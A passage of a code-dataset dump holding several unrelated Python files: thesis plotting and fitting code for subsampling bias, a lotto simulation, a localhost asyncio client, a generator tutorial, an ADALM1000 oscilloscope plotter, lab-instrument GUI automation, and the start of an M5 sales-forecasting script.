plt.show()\n\n\ndef coalescing_method():\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n file = '/Users/mk14423/Desktop/Data/0_thesis/SubSampleSK/datasets.hdf5'\n groups = ['N50', 'N100', 'N200', 'N400', 'N800']\n g_labels = ['N=50', 'N=100', 'N=200', 'N=400', 'N=800']\n T_trues = [1.1, 1.175, 1.1, 1.1, 1.25]\n figw, figh = plt.rcParams.get('figure.figsize')\n # fig, ax = mkfigure(\n # nrows=2, ncols=2,\n # sharex=True,\n # # figsize=(figw, figh * 1.4)\n # )\n fig, ax = mkfigure(\n nrows=2, ncols=1,\n sharex=True,\n # figsize=(figw, figh * 1.4)\n )\n ax = ax.ravel()\n # iG = 4\n iGs = [0, 1, 2, 3, 4]\n cuts = []\n iGs = [2,3]\n iP = 0\n for iG in iGs:\n # print(iG)\n df = get_subsampling_data_frame(file, groups[iG], T_trues[iG])\n # print(df)\n df['std_J'] = df['std_J'] * T_trues[iG]\n rescale = 1\n df['B'] = df['B'] * rescale\n df = df[df['B'] > 3e3 * rescale]\n df = df.groupby(['B'], as_index=True).mean()\n df = df.reset_index()\n\n # df['std_J'] = uniform_filter1d(df['std_J'], nWindow, mode='reflect')\n xs = np.flip(1 / df['B'].to_numpy())\n ys = np.flip(df['std_J'].to_numpy()) # .to_numpy()\n # ax[0, 0].plot(xs, ys)\n dydx = np.gradient(ys, xs)\n x_cut = sliding_coalesc(xs, dydx, ax[iP], CATCOLS[iG], method=True)\n ax[iP].set(\n ylabel=r'$\\partial y / \\partial \\left( B^{-1} \\right)$',\n xlim=[xs.min(), xs.max()],\n # ylim=[None, 2]\n )\n ax[iP].ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n ax[iP].xaxis.set_major_locator(plt.MaxNLocator(4))\n iP += 1\n ax[-1].set(xlabel=r'$B^{-1}$')\n plt.show()\n\ndef b1_Btilde_N_helper(Ns, bias_measure, fitfunc, ax, fitls='-', **pltargs):\n line, = ax.plot(\n Ns, bias_measure,\n 
**pltargs)\n popt, _ = curve_fit(fitfunc, Ns, bias_measure)\n r2 = r2_score(bias_measure, fitfunc(Ns, *popt))\n print(popt, r2)\n xs = np.linspace(Ns.min(), Ns.max(), 1000)\n ax.plot(xs, fitfunc(xs, *popt), ls=fitls, marker=',', c=line.get_color())\n return popt, r2\n\ndef b1_Btilde_N():\n # this is normalised data!\n Btilde_results_5e3 = np.array(\n [\n [1.00600985e+00, 2.72014640e+02, 9.88233835e-01],\n [9.94183234e-01, 5.19063249e+02, 9.61574352e-01],\n [1.00267001e+00, 1.02930216e+03, 9.37379556e-01],\n [9.97783478e-01, 2.04440470e+03, 8.69604374e-01],\n [1.02747743e+00, 4.28098167e+03, 7.60336351e-01],\n ]\n )\n Btilde_results_8e3 = np.array(\n [\n [1.00335165e+00, 2.36632494e+02, 9.88233835e-01],\n [9.98044149e-01, 5.73135231e+02, 9.61574352e-01],\n [9.99475985e-01, 9.85167260e+02, 9.37379556e-01],\n [9.98207849e-01, 2.05093924e+03, 8.69604374e-01],\n [1.00340312e+00, 3.99806103e+03, 7.60336351e-01],\n ]\n )\n # Btildes = Btilde_results_8e3[:, 1]\n b1s = np.array([184.914, 377.723, 816.309, 1786.117, 4059.442])\n Bts = Btilde_results_5e3[:, 1]\n emin = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Ns = np.array([50, 100, 200, 400, 800])\n fig, ax = mkfigure(nrows=1, ncols=1)\n # whoops, had this the wrong way round, but whatever..\n print('---------')\n func = p1\n _, r2_p1Bt = b1_Btilde_N_helper(\n Ns, Bts, func, ax[0, 0],\n c=CATCOLS[0], ls='none', label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n _, r2_p1b1 = b1_Btilde_N_helper(\n Ns, b1s, func, ax[0, 0],\n c=CATCOLS[1], ls='none', label=r'$b_1$ variable fitting cut-off'\n )\n print(r2_p1b1, r2_p1Bt)\n func = p_power\n _, r2_ppBt = b1_Btilde_N_helper(\n Ns, Bts, func, ax[0, 0], fitls='--',\n c=CATCOLS[0], ls='none'\n # , label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n _, r2_ppb1 = b1_Btilde_N_helper(\n Ns, b1s, func, ax[0, 0], fitls='--',\n c=CATCOLS[1], ls='none'\n # , label=r'$b_1$ variable fitting cut-off'\n )\n print(r2_ppb1, r2_ppBt)\n # improvements\n imp_b1 = (r2_ppb1 - r2_p1b1) / r2_ppb1\n imp_Bt = (r2_ppBt - r2_p1Bt) / r2_ppBt\n print(imp_b1, imp_Bt)\n print('---------')\n\n ax[0, 0].set(xlabel=r'$N$', ylabel='Bias measure')\n ax[0, 0].legend()\n\n axin = ax[0,0].inset_axes([0.6, 0.15, 0.3, 0.3])\n func = sqrt_x\n _, r2_emin = b1_Btilde_N_helper(\n Ns, emin, func, axin, fitls='--',\n c=CATCOLS[0], ls='none'\n # , label=r'$\\tilde{B}$ fitting cut-off: $B = 5 \\times 10^3$'\n )\n axin.set(xlabel=r'$N$', ylabel=r'$\\varepsilon _{min}$')\n\n plt.show()\n\ndef b1_vs_emin_N():\n b1s = np.array([184.914, 377.723, 816.309, 1786.117, 4059.442])\n emins = np.array([0.14320461, 0.20949111, 0.29832886, 0.44711299, 0.69887905])\n Ns = np.array([50, 100, 200, 400, 800])\n plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n fig, ax = plt.subplots()\n x = b1s\n y = emins * (Ns ** 0.5)\n ax.plot(x, y, ls='none')\n popt, _ = curve_fit(p1, x, y)\n r2 = r2_score(y, p1(x, *popt))\n print(popt, r2)\n ax.plot(\n x, p1(x, *popt), ls='--', c='k', marker=',',\n label=r'$R^2 = 0.999$')\n ax.set(xlabel=r'$b_{1}$', ylabel=r'$\\varepsilon _{min} N^{1/2}$')\n ax.legend(loc='upper left')\n # plt.savefig('/Users/mk14423/Documents/tempfigs/analytical-bias-emin-vs-b1.png')\n plt.show()\n\n# this is for a fixed B!\ndef analytical_error(E, N, mu, T, sigma):\n # E = 1/BD*0.5\n # err = E / (N**0.5)\n # err = err / T\n # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n # err = err * factor\n # WHOOPS! 
NEED TO TRIPLE CHECK THIS!\n    # THIS SHOULD MAYBE BE DIFFERENT NOW!\n    # err = E / (N**0.5)\n    err = E * T * (N**0.5)\n    factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n    err = err / factor\n    return err\n\ndef analytical_Kfactor(B, N, mu, T, sigma):\n    # E = 1/BD*0.5\n    # err = E / (N**0.5)\n    # err = err / T\n    # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n    # err = err * factor\n    # WHOOPS! NEED TO TRIPLE CHECK THIS!\n    # THIS SHOULD MAYBE BE DIFFERENT NOW!\n    # err = E / (N**0.5)\n    K = T / (B * (N ** 0.5))\n    factor = ((mu ** 2) / N) + (sigma ** 2)\n    K = K / (factor ** 0.5)\n    # err = E * T * (N**0.5)\n    # factor = np.sqrt(((mu ** 2) / N) + (sigma ** 2))\n    # err = err / factor\n    return K\n\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib.colors import LogNorm\n\nfrom inference.scripts.paper2022May import load\nfrom scipy.ndimage import gaussian_filter\n\ndef analytical_analysis():\n    runsN50 = [\n        'B1e4-Nscaling/N50_1', 'B1e4-Nscaling/N50_2', 'B1e4-Nscaling/N50_3',\n        'B1e4-Nscaling/N50_4', 'B1e4-Nscaling/N50_5', 'B1e4-Nscaling/N50_6',\n    ]\n    runsN100 = [\n        'B1e4-Nscaling/N100_1', 'B1e4-Nscaling/N100_2', 'B1e4-Nscaling/N100_3',\n        'B1e4-Nscaling/N100_4', 'B1e4-Nscaling/N100_5', 'B1e4-Nscaling/N100_6',\n    ]\n    runsN800 = [\n        'B1e4-Nscaling/N800_1',\n    ]\n    N = 50\n    params, obs, = load.load_PD_fixedB(runsN50, '/Users/mk14423/Desktop/PaperData')\n    # params, obs, = load.load_N200_Bfixed_obs('/Users/mk14423/Desktop/PaperData')\n    print(params.shape, obs.shape)\n    X = params['J']\n    Y = params['T']\n    error = obs['e']\n    # error = gaussian_filter(error, sigma=0.5)\n    # error[error > 1.5 * error.min()] = 1.5 * error.min()\n    # Z = analytical_error(E=1, N=N, mu=X, T=Y, sigma=1)\n    # bias_surface = error * Z\n    K = analytical_Kfactor(B=10 ** 4, N=N, mu=X, T=Y, sigma=1)\n    # I don't really understand why this doesn't show what I want it to :(\n    # bias_surface = error / K\n    bias_surface = error / K\n    maxfactor = 10\n\n    fig = plt.figure()\n    gs = fig.add_gridspec(2, 4)\n    ax = np.zeros((2, 2))\n    ax0 = fig.add_subplot(gs[0, 0:2])\n    ax1 = fig.add_subplot(gs[0, 2:])\n    ax2 = fig.add_subplot(gs[1:, 0:])\n    # ax[0]\n    ax = [ax0, ax1, ax2]\n    \n    im = ax[0].pcolor(\n        X, Y, error,\n        # norm=LogNorm(vmin=error.min(), vmax=error.max())\n        vmin=0.95 * error.min(),\n        vmax=maxfactor * error.min()\n    )\n    im = ax[1].pcolor(\n        X, Y, bias_surface,\n        # norm=LogNorm(vmin=bias_surface.min(), vmax=bias_surface.max())\n        vmin=0.95 * bias_surface.min(),\n        vmax=maxfactor * bias_surface.min()\n    )\n    # fig.colorbar(im, ax=ax[1], label=r'$E$', use_gridspec=True)\n\n    ax[0].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon$')\n    ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon/K$')\n    # ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$')\n\n    ax2 = ax[2].twinx()\n    cut = 8\n    print(X[0:cut, 0])\n    e_collapsed = np.mean(error[0:cut, 0:21], axis=0)\n    b_collapsed = np.mean(bias_surface[0:cut, 0:21], axis=0)\n    print(b_collapsed.shape)\n    print(Y[0, 0:21])\n    ax[2].plot(Y[0, 0:21], e_collapsed, c=CATCOLS[0])\n    ax2.plot(Y[0, 0:21], b_collapsed, c=CATCOLS[1])\n    ax[2].set(\n        xlabel=r'$T$',\n        ylabel=r'$\\varepsilon$',\n        ylim=[0.95 * e_collapsed.min(), maxfactor * e_collapsed.min()])\n    ax2.set(\n        ylabel=r'$Bias=\\epsilon / K$',\n        ylim=[0.95 * b_collapsed.min(), maxfactor * b_collapsed.min()])\n    # ax.set(yscale='log')\n    # ax2.set(yscale='log')\n    ax[2].yaxis.label.set_color(CATCOLS[0])\n    ax2.yaxis.label.set_color(CATCOLS[1])\n    plt.show()\n\n    plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n    fig, ax = plt.subplots()\n    Ts = 
np.linspace(0.5, 2, 100)\n    Ks = analytical_error(E=1, N=N, mu=0, T=Ts, sigma=1)\n    # unclear why this is all 1\n    ax.plot(Ts, 1/Ks, marker=',')\n    ax.set(xlabel=r'$T$', ylabel=r'$1/K$')\n    # plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisaside.mplstyle')\n    # plt.savefig('/Users/mk14423/Documents/tempfigs/analytical-bias-asideT.png')\n    plt.show()\n\n\ndef analytical_analysis_includingTau():\n    runsN50 = [\n        'B1e4-Nscaling/N50_1', 'B1e4-Nscaling/N50_2', 'B1e4-Nscaling/N50_3',\n        'B1e4-Nscaling/N50_4', 'B1e4-Nscaling/N50_5', 'B1e4-Nscaling/N50_6',\n    ]\n    runsN100 = [\n        'B1e4-Nscaling/N100_1', 'B1e4-Nscaling/N100_2', 'B1e4-Nscaling/N100_3',\n        'B1e4-Nscaling/N100_4', 'B1e4-Nscaling/N100_5', 'B1e4-Nscaling/N100_6',\n    ]\n    runsN800 = [\n        'B1e4-Nscaling/N800_1',\n    ]\n    N = 200\n    cut = 8\n    maxfactor = 10  # display cap, as in analytical_analysis(); was undefined in this function\n\n    # params, obs, = load.load_PD_fixedB(runsN800, '/Users/mk14423/Desktop/PaperData')\n    params, obs, = load.load_N200_Bfixed_obs('/Users/mk14423/Desktop/PaperData')\n    print(params.shape, obs.shape)\n    X = params['J']\n    Y = params['T']\n    error = obs['e']\n    tau = obs['tau']\n    tau[tau < 1] = 1\n    B = 1e4 / tau\n    plt.plot(Y[0, 0:21], np.mean(tau[0:cut, 0:21], axis=0))\n    plt.show()\n\n    # skipping this smoothing for now\n    # error = gaussian_filter(error, sigma=0.5)\n    # error[error > 1.5 * error.min()] = 1.5 * error.min()\n    Z = analytical_error(E=1, N=N, mu=X, T=Y, sigma=1)\n    # Z = Z\n    # plt.pcolor(X, Y, Z)\n    # plt.show()\n    bias_surface = error / Z\n\n\n    fig = plt.figure()\n    gs = fig.add_gridspec(2, 4)\n    ax = np.zeros((2, 2))\n    ax0 = fig.add_subplot(gs[0, 0:2])\n    ax1 = fig.add_subplot(gs[0, 2:])\n    ax2 = fig.add_subplot(gs[1:, 0:])\n    # ax[0]\n    ax = [ax0, ax1, ax2]\n    \n    im = ax[0].pcolor(\n        X, Y, error,\n        # norm=LogNorm(vmin=error.min(), vmax=error.max())\n        vmin=0.95 * error.min(),\n        vmax=maxfactor * error.min()\n    )\n    im = ax[1].pcolor(\n        X, Y, bias_surface,\n        # norm=LogNorm(vmin=bias_surface.min(), vmax=bias_surface.max())\n        vmin=0.95 * bias_surface.min(),\n        vmax=maxfactor * bias_surface.min()\n    )\n    # fig.colorbar(im, ax=ax[1], label=r'$E$', use_gridspec=True)\n\n    ax[0].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon$')\n    ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$', title=r'$\\varepsilon/K$')\n    # ax[1].set(xlabel=r'$\\mu$', ylabel=r'$T$')\n\n    ax2 = ax[2].twinx()\n    print(X[0:cut, 0])\n    e_collapsed = np.mean(error[0:cut, 0:21], axis=0)\n    b_collapsed = np.mean(bias_surface[0:cut, 0:21], axis=0)\n    print(b_collapsed.shape)\n    print(Y[0, 0:21])\n    ax[2].plot(Y[0, 0:21], e_collapsed, c=CATCOLS[0])\n    ax2.plot(Y[0, 0:21], b_collapsed, c=CATCOLS[1])\n    ax[2].set(\n        xlabel=r'$T$',\n        ylabel=r'$\\varepsilon$',\n        ylim=[0.95 * e_collapsed.min(), maxfactor * e_collapsed.min()]\n    )\n    ax2.set(\n        ylabel=r'$Bias=\\epsilon / K$',\n        ylim=[0.95 * b_collapsed.min(), maxfactor * b_collapsed.min()]\n    )\n    # ax.set(yscale='log')\n    # ax2.set(yscale='log')\n    ax[2].yaxis.label.set_color(CATCOLS[0])\n    ax2.yaxis.label.set_color(CATCOLS[1])\n    plt.show()\n\n\n\n# this also has some random stuff about the error!!\ngraidents()\n# coalescing_example()\n# coalescing_method()\n# b1_Btilde_N()\n# b1_vs_emin_N()\n# analytical_analysis()\n# analytical_analysis_includingTau()\n# plt.style.use('/Users/mk14423/Dropbox/mpl-styles/thesisbody.mplstyle')\n","repo_name":"maxkloucek/neuroimaging-analysis","sub_path":"subsampleSK/convergence_method.py","file_name":"convergence_method.py","file_ext":"py","file_size_in_byte":26849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2019965824","text":"import random\n\nwin = []\nlos = []\ntrafione6 = 0\ntrafione5 = 0\ntrafione4 = 0\ntrafione3 = 0\n\nfor a in range(6):\n win.append(str(random.randint(1, 49)))\n\nx = set(win)\n\nfor b in range(6 * 100000):\n while True:\n liczba = str(random.randint(1, 49))\n if liczba in los:\n pass\n else:\n los.append(liczba)\n break\n if len(los) == 6:\n y = set(los)\n z = x&y\n if len(z) == 6:\n trafione6 += 1\n if len(z) == 5:\n trafione5 += 1\n if len(z) == 4:\n trafione4 += 1\n if len(z) == 3:\n trafione3 += 1\n los.clear()\n\n\nprint(x)\nprint(trafione6)\nprint(trafione5)\nprint(trafione4)\nprint(trafione3)","repo_name":"mateusza-szkolenia/2020-10-10-alx-python","sub_path":"dzien05/rozw_lotto_af.py","file_name":"rozw_lotto_af.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11853965612","text":"import asyncio\nimport aioconsole\n\nasync def main():\n reader, writer = await asyncio.open_connection('127.0.0.1', 8888)\n while True:\n message = await aioconsole.ainput(\"> \")\n writer.write(message.encode() + b'\\n')\n await writer.drain()\n\n response = await reader.readline()\n response_lines = response.decode().strip().split(',')\n for line in response_lines:\n print(line)\n\n if message.strip() == 'exit':\n break\n \n writer.close()\n await writer.wait_closed()\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"NGsHjodra/ITP_3-Python_remote_file_viewer","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22543331588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/9/14 08:30\n# @Author : zhangsheng\n\n\n# generator 不必创建完整的list,从而节省大量的空间\n\n# 第一种方法很简单,只要把一个列表生成式的[]改成(),就创建了一个generator:\n\ng = (x * x for x in range(10))\nfor value in g:\n print(value)\n\n\ndef fib1(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib1(5)\n\n\n# 如果一个函数定义中包含yield关键字,那么这个函数就不再是一个普通函数,而是一个generator:\n# generator的函数,在每次调用next()的时候执行,遇到yield语句返回,再次执行时从上次返回的yield语句处继续执行。\n\ndef fib2(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield b # 遇到yield语句返回\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib_generator = fib2(5)\nprint('=================')\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint(next(fib_generator))\nprint('=================')\n# 用for循环调用generator时,发现拿不到generator的return语句的返回值。如果想要拿到返回值,必须捕获StopIteration错误,返回值包含在StopIteration的value中\nfor num in fib2(6):\n print(num)\n # 没有打印return语句的返回值 'done'\n\nfib_g = fib2(6)\nwhile True:\n try:\n print('fib_g_vale:', next(fib_g))\n except StopIteration as e:\n print('return value:', e.value)\n break\n\nprint('=================')\n\n\ndef yield_t(n):\n for i in range(n):\n yield call(i)\n print(\"i=\", i)\n # 做一些其它的事情\n print(\"do something.\")\n print(\"end.\")\n\n\ndef call(i):\n return i * 2\n\n\n# 使用for循环\nfor i in yield_t(5):\n print(i, \",\")\n","repo_name":"zhsheng26/PythonLesson","sub_path":"高级特性/4_生成器.py","file_name":"4_生成器.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72627409820","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nADALM1000\nADC CHA **und** CHB im High Impedance Modus gespeist mit einem externen Signal\nkontinuierlich auslesen und als Live Plot darstellen.\nObjektorientierte Variante mit Trigger.\nBei einem positiven Triggerwert wird beim Überschreien der Triggerschwelle und\nbei einem negativen Triggerwert bei Unterschreiten der Triggerschwelle getriggert.\nhttps://analogdevicesinc.github.io/libsmu/classsmu_1_1Signal.html\n\n24.6.2020, S Mack\n\"\"\"\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom pysmu import Session, Mode\n\nN_S_PTS = 7000 # Number of sampling points\nRED_RATE = 1 # Reduction ratio for displayed sample rate\nTRIG = 3 # Trigger level in Volts, negative: Signal must be smaller\nV_RANGE = [-0.1,5.1] # Vertical Range in Volts\nH_MAX = 5 # Horizontal Range from 0 to this value in Milliseconds\n\n\nclass Scope(object):\n\n def __init__(self, ax, session, h_max, v_range, n_s_pts=400, red_rate=1, mode_a='Hi_Z',mode_b='Hi_Z', trig=0): \n self.ax = ax\n self.n_s_pts = n_s_pts # Number of sampling points\n self.red_rate = red_rate # Reduction ratio of effecive sampling rate\n self.n_d_pts = int(n_s_pts/red_rate) # Number of displayed points\n self.trig = trig # Trigger level in Volts, 0 = no trigger action\n self.x_vals = np.arange(0, self.n_d_pts, 1)*self.red_rate/100 # Sampling times in ms\n self.line_a, = ax.plot(self.x_vals, np.zeros(self.n_d_pts),'-',label='CH A (TRG)')\n self.line_b, = ax.plot(self.x_vals, np.zeros(self.n_d_pts),'-',label='CH B')\n self.ax.set_ylim(v_range[0], v_range[1])\n if(h_max < self.n_d_pts*self.red_rate/100):\n self.ax.set_xlim(-0.5, h_max + 0.5)\n else:\n self.ax.set_xlim(-0.5, self.n_d_pts*self.red_rate/100 + 0.5)\n self.ax.grid(linestyle=':')\n self.ax.legend(loc='lower right')\n self.ax.set(xlabel='Time (ms)', ylabel='Voltage (V)')\n \n self.session = session\n self.dev = session.devices[0]\n chan_a = self.dev.channels['A']\n chan_b = self.dev.channels['B']\n \n if (mode_a == 'Hi_Z'): # Set channel to high impedance mode\n chan_a.mode = Mode.HI_Z \n else:\n print('Mode Channel A not yet supported')\n if (mode_b == 'Hi_Z'): # Set channel to high impedance mode\n chan_b.mode = Mode.HI_Z \n else:\n print('Mode Channel B not yet supported')\n \n self.session.start(0) # Start a continuous session.\n\n def get_samples(self):\n samples = [[],[]]\n # Read NUM_SAM_PTS samples in a blocking fashion (-1), flush surplus samples.\n samples_raw = self.dev.read(self.n_s_pts,timeout=-1, skipsamples=True)\n for x in samples_raw:\n samples[0].append(x[0][0])\n samples[1].append(x[1][0])\n return samples\n\n # returns first index of sampled data with value > val for positive vals\n # and < val for negative vals\n def trigger(self, vals):\n trigger_start = 0 # return 0 in case of no trigger event\n # flatnonzero returns index of nonzero (=True) elements\n if(self.trig > 0): \n thres_indices = np.flatnonzero(np.array(vals) > self.trig)\n else:\n thres_indices = np.flatnonzero(np.array(vals) < -self.trig)\n if (len(thres_indices)>0):\n print('triggered')\n trigger_start = min(thres_indices) # returs index trigger event\n else:\n print('no trigger')\n trigger_start = -1\n return trigger_start\n \n def show_samples(self,vals):\n vals_a = vals[0][:: self.red_rate] # reduce effective sampling rate\n vals_b = vals[1][:: self.red_rate] # reduce effective sampling rate\n if(self.trig != 0): # show only if trigger event\n 
trigger_start=self.trigger(vals_a) \n if(trigger_start != -1):\n disp_start = max(0, trigger_start - 20) # display 20 pts ahead trigger\n self.line_a.set_data(self.x_vals[:(self.n_d_pts-disp_start)],vals_a[disp_start:])\n self.line_b.set_data(self.x_vals[:(self.n_d_pts-disp_start)],vals_b[disp_start:])\n else:\n self.line_a.set_ydata(vals_a) # plot new values\n self.line_b.set_ydata(vals_b) # plot new values\n \n def yield_samples(self): # Must be iterator and separate method\n while True:\n samples = self.get_samples()\n yield samples \n \n\ntry:\n session = Session()\n if session.devices:\n print('ADALM1000 gefunden...')\n fig, ax = plt.subplots()\n my_scope = Scope(ax,session,H_MAX,V_RANGE,n_s_pts=N_S_PTS, red_rate=RED_RATE, mode_a='Hi_Z', mode_b='Hi_Z', trig=TRIG)\n ani = animation.FuncAnimation(fig, func=my_scope.show_samples, frames=my_scope.yield_samples, interval=50, blit=False)\n plt.show()\n time.sleep(1)\n else:\n print('no devices attached')\n \nexcept KeyboardInterrupt:\n print()\n print('Strg + C erkannt...')\n time.sleep(1)\n \nfinally:\n print('Ende.')\n session.end()\n pass \n","repo_name":"StefanMack/M1K","sub_path":"adalm-scope-chab-trig.py","file_name":"adalm-scope-chab-trig.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3089493689","text":"import math \na = [.22,-.41,-.16,.03,.23,.23,.28,-.06,-.2,.07,-1.2]\nsdforeachlist = []\nsquaredsd = []\nsumofall = 0\nsdforeach = 0\nsumofallsd = 0\nvariance = 0\nroundedsdforeach = 0\nfor x in a:\n sumofall = sumofall + x\navg = sumofall/len(a)\nroundavg = round(avg,1)\nfor x in a:\n sdforeach = x - roundavg\n roundedsdforeach=round(sdforeach,1)\n sdsquared = pow(roundedsdforeach,2)\n sdforeachlist.append(sdsquared)\nfor x in sdforeachlist:\n sumofallsd = sumofallsd + x\nvariance = sumofallsd / (len(a)-1)\nprint(round(math.sqrt(variance),2))","repo_name":"juansantiagobarragan/standard_deviation","sub_path":"standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43316633316","text":"# Th screen Resolution is 1366x768\r\nimport pyautogui\r\nimport visa\r\nimport time\r\nimport numpy as np\r\nfrom struct import unpack\r\nimport csv\r\n\r\n#pyautogui.PAUSE=1 #Just a pausing command\r\n\r\ndef setvoltage(vbase, vpulse, ch):\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n #Double click on Waveform Sequencer for specified channel no \r\n pyautogui.click(100,150+(ch-1)*65) \r\n pyautogui.click(100,150+(ch-1)*65)\r\n# time.delay(0.2)\r\n \r\n pyautogui.click(300,230) #Double click waveform properties\r\n pyautogui.click(300,230)\r\n \r\n pyautogui.click(960,140) #Setting vpulse\r\n pyautogui.typewrite(str(vpulse),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(960,175) # Setting vbase\r\n pyautogui.typewrite(str(vbase),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(780,140) # Setting amplitude\r\n pyautogui.typewrite(str((vpulse-vbase)/2),interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(930,640) # Clicking ok button\r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\n\r\ndef settriggerdelay(t, ch): # t to be set in !NANOSECONDS!\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n #Double click on Setting for specified channel no \r\n pyautogui.click(100,130+(ch-1)*65) \r\n pyautogui.click(100,130+(ch-1)*65)\r\n# time.delay(0.2)\r\n \r\n pyautogui.click(700,260) # Click Trigger Delay box\r\n pyautogui.typewrite(str(t),interval=0.1)# Enter time in NANOSECONDS\r\n pyautogui.typewrite('n',interval=0.1)\r\n pyautogui.typewrite('\\n',interval=0.1)\r\n \r\n pyautogui.click(900,570) # Clicking ok button\r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\ndef togglechannel(ch):\r\n pyautogui.click(190,70) # Stop the current AFG run\r\n \r\n pyautogui.click(250+(ch-1)*60,70)# Toggle the channel \r\n \r\n pyautogui.click(190,70) # Start the next AFG run\r\n return\r\n\r\n\r\ndef savedatacsv(scope, ch, filename):\r\n s=\"\"\r\n scope.write(s.join(('DATA:SOU CH',str(ch)))) #Set Data source Channel\r\n scope.write('DATA:WIDTH 1') # Set Data width\r\n scope.write('DATA:ENC RPB') # Set data encoding\r\n \r\n ymult = float(scope.query('WFMPRE:YMULT?')) # Pre-digitising level\r\n yzero = float(scope.query('WFMPRE:YZERO?')) # Offset, if any\r\n yoff = float(scope.query('WFMPRE:YOFF?')) # Related to trace position on screen\r\n xincr = float(scope.query('WFMPRE:XINCR?'))# Time increment in sampling (x axis)\r\n \r\n scope.write('CURVE?')\r\n data = scope.read_raw()\r\n headerlen = 2 + int(data[1])\r\n header = data[:headerlen]\r\n ADC_wave = data[headerlen:-1]\r\n \r\n ADC_wave = np.array(unpack('%sB' % len(ADC_wave),ADC_wave))\r\n \r\n Volts = (ADC_wave - yoff) * ymult + yzero\r\n \r\n Time = np.arange(0, xincr * len(Volts), xincr)\r\n \r\n savefile=s.join((filename,'.csv'))\r\n with open(savefile,'w') as file:\r\n writer= csv.writer(file, delimiter=',') \r\n #writer.writerow([]) #Repair this row to display the Vpre and Vcoll in the csv file too.\r\n for i in range(0,len(Time)):\r\n if i==0:\r\n writer.writerow(['Time','Volts'])\r\n else:\r\n writer.writerow([str(Time[i]),str(Volts[i])]) \r\n return","repo_name":"sumukhvaidya/TDCF","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23015184418","text":"from datetime import datetime, timedelta\nimport gc\nimport numpy as np, pandas as pd\nimport lightgbm as lgb\n#import xgboost as xgb\n\nCAL_DTYPES={\"event_name_1\": \"category\", \"event_name_2\": \"category\", \"event_type_1\": \"category\", \n \"event_type_2\": \"category\", \"weekday\": \"category\", 'wm_yr_wk': 'int16', \"wday\": \"int16\",\n \"month\": \"int16\", \"year\": \"int16\", \"snap_CA\": \"float32\", 'snap_TX': 'float32', 'snap_WI': 'float32' }\n\nPRICE_DTYPES = {\"store_id\": \"category\", \"item_id\": \"category\", \"wm_yr_wk\": \"int16\",\"sell_price\":\"float32\" }\n\nh = 28 \nmax_lags = 43\nFIRST_DAY = 500\ntr_last = 1941\nfday = datetime(2016,5,23) \nfday_prev = datetime(2016,4,25)\nfday_prev_list = [fday_prev+timedelta(i) for i in range(h)]\n#store_number = 8\n\ndef create_dt(is_train = True, nrows = None, first_day = 1200):\n \n # prices\n prices = pd.read_csv(\"kaggle/input/m5-forecasting-accuracy/sell_prices.csv\", dtype = PRICE_DTYPES)\n \n prices['price_max'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('max')\n prices['price_norm'] = prices['sell_price']/prices['price_max']\n del prices['price_max']\n \n prices['price_avg'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('mean')\n #prices['price_nunique'] = prices.groupby(['store_id','item_id'])['sell_price'].transform('nunique')\n del prices['sell_price']\n \n for col, 